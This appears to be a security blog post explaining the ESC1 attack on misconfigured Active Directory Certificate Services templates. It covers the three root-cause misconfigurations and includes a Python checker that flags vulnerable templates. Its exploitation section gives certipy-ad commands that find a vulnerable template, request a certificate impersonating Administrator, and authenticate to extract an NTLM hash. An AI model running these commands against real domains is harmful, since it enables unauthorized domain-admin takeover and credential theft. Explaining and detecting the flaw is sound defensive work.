ESC1-Attack

ESC1 Attack

An ESC1 attack is a privilege escalation technique that exploits misconfigured certificate templates within Microsoft Active Directory Certificate Services (AD CS) to gain unauthorized access to high-privileged accounts, such as Domain Administrators.
This attack enables an adversary to request and receive a digital certificate for a privileged identity, allowing them to authenticate as that user and gain elevated control over the Active Directory environment.


🧩 Root Cause

Three key misconfigurations combine to make ESC1 possible:

  1. Overly Broad Enrollment Permissions – The certificate template’s ACL grants Enroll (or Autoenroll) rights to Domain Users or other low-privileged groups. This means standard users can request certificates from that template.

  2. Subject Supplied by Enrollee (ENROLLEE_SUPPLIES_SUBJECT) – The template allows the requester to specify their own Subject or Subject Alternative Name (SAN). Attackers can insert another user’s UPN/SAMAccountName, making the certificate appear to belong to that target account.

  3. Authentication EKUs Enabled – The certificate template includes Client Authentication or Smartcard Logon EKUs. Certificates with these EKUs can be used for Kerberos PKINIT or certificate-based authentication to services.
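As an added example (not part of the original post), the Python below evaluates one template record against the three conditions above; it also goes slightly beyond the list by treating CA manager approval and required authorized signatures as blockers, since either stops a request before issuance. The dict layout and the sample SIDs are constructed for the example; the key names mirror the pKICertificateTemplate LDAP attributes.

```python
# Added example, not from the original post: evaluate one certificate template's
# LDAP attributes for the ESC1 conditions. Dict shape and sample values are constructed.

# Bit in msPKI-Certificate-Name-Flag: requester may supply the Subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: every request is held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that allow a certificate to authenticate a principal.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Well-known broad principals; domain-relative RIDs 513/515 are Domain Users/Computers.
BROAD_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, BUILTIN\Users


def is_low_privileged(sid):
    return sid in BROAD_SIDS or sid.endswith(("-513", "-515"))


def esc1_findings(template):
    """Return the ESC1 root-cause conditions met by one template record.

    Keys mirror pKICertificateTemplate attributes (constructed for this example):
      name_flag (msPKI-Certificate-Name-Flag), enroll_flag (msPKI-Enrollment-Flag),
      ra_sigs (msPKI-RA-Signature), ekus (pKIExtendedKeyUsage OIDs; empty = any),
      enroll_sids (SIDs granted Enroll or AutoEnroll in the template ACL).
    """
    findings = []
    broad = [s for s in template["enroll_sids"] if is_low_privileged(s)]
    if broad:
        findings.append("enroll rights for low-privileged principals: " + ", ".join(broad))
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ENROLLEE_SUPPLIES_SUBJECT set: requester controls Subject/SAN")
    ekus = set(template["ekus"])
    if not ekus or ekus & AUTH_EKUS:
        findings.append("authentication EKU present (or no EKU restriction)")
    return findings


def is_esc1_vulnerable(template):
    """True when all three conditions hold and no request-time control blocks it."""
    blocked = (template["enroll_flag"] & CT_FLAG_PEND_ALL_REQUESTS) or template["ra_sigs"] > 0
    return len(esc1_findings(template)) == 3 and not blocked
```

Clearing ENROLLEE_SUPPLIES_SUBJECT, removing the authentication EKU, or tightening the Enroll ACL each removes a condition; requiring manager approval blocks the request without changing the template's purpose.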


⚡ Attack Power

Given an ESC1-vulnerable template, an attacker can obtain a certificate (exported as a .pfx) issued in the name of any user and then authenticate to the domain with it using certificate-based authentication.


🧠 Exploitation Example

Step 1: Find the Vulnerable Certificate Template

```bash
certipy-ad find -u $username@$domain -p '$password' -dc-ip $target -stdout -vulnerable
# OR
certipy-ad find -username '$controller_user@$domain' -password '$controller_user_pass' -dc-ip $target -stdout -vulnerable
```

Step 2: Request a Certificate for an Admin Account

```bash
certipy-ad req -username '$controller_user@$domain' -password '$controller_user_pass' -ca $ca_Name -target $target -template $template_Name -upn Administrator@$domain
```

Step 3: Authenticate and Extract the NTLM Hash

```bash
certipy-ad auth -pfx administrator.pfx -dc-ip $target
```

🧾 Summary

| Aspect | Details |
|---|---|
| Attack Type | Privilege Escalation |
| Service Targeted | Active Directory Certificate Services (AD CS) |
| Main Exploit Vector | Misconfigured Certificate Template |
| Impact | Domain Admin Privilege Escalation |

This post is licensed under CC BY 4.0 by the author.